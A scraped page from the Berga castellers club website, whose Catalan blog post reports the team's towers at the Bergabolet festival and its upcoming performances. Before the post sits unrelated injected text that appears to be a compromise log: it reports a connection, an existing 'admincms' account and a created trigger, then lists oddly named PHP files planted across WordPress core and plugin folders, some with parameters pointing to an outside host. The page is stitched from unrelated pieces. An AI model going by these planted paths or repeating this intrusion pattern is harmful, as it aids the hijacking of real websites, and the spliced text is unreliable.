Connected successfully https://castellersdeberga.cat admincms exists trigger created https://castellersdeberga.cat/wp-config-sample.php?wp https://castellersdeberga.cat/wp-admin/includes/class-wp-list-table-compat-wp-private-private-core-meta.php?varname=ofj.hu/ajax https://castellersdeberga.cat/wp-admin/privacy-ajax-response-private-ajax-private-cron-core.php?limit=ofj.hu/ajax https://castellersdeberga.cat/wp-admin/includes/meta-boxes-cron-ajax-response-ajax-wp-ajax-cron-private-ajax.php https://castellersdeberga.cat/wp-content/plugins/woo-redsys-gateway-light/about-redsys-private-ajax-response-private-core-stream-cron-ajax-response.php https://castellersdeberga.cat/wp-content/plugins/revslider/index-ajax-response-private-private-private-cron-wp-private-ajax-response-meta-stream.php https://castellersdeberga.cat/wp-includes/random_compat/random_int-meta-ajax-response-ajax.php https://castellersdeberga.cat/wp-includes/registration-meta-private-ajax-response-ajax-response-cron-private.php ________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________ Castellers de Berga | Més castells de 7 a la Bergabolet
 

Més castells de 7 a la Bergabolet


Més castells de 7 a la BergaboletEl cap de setmana del 3 i 4 d’octubre, Berga està abocada al món del Bolet. En el marc de totes les activitats de Bergabolet, els Castellers de Berga hem actuat en solitari aquest dissabte a la tarda, a la Plaça del Forn. Primera vegada que actuàvem a aquesta plaça. Després d’un pilar de 4 d’inici, hem descarregat el 3 i el 4 de 7. En tercera ronda, hem encarat el 3 de 7 amb agulla. No l’hem pogut completar i hem desmuntat dues vegades el castell quan els dosos ja eren al seu lloc. El castell no agafava bones mides i la pendent de la plaça tampoc no hi han ajudat. Finalment, hem descarregat el 3 de 6 amb agulla. Hem completat la diada estrenant un nou pilar de 5 i hem tancat amb dos pilars de 4.
Els Castellers de Berga estem contents d’haver pariticipat a una jornada amb molt ambient al centre històric de Berga. Molta gent, bolets, tapes i castells.
Amb els dos castells de 7 descarregats aquesta tarda, arribem a les 96 aletes de castells de 7 pisos i ens col.loquem a 4 aletes de les 100. Queden 3 diades per aconseguir aquesta xifra.
La propera setmana descansem. La següent actuació serà a Avià, el diumenge 18 d’octubre i clourem la temporada amb l’actuació a Berga del dissabte 24 d’octubre i l’actuació a Súria el dissabte 31 d’octubre.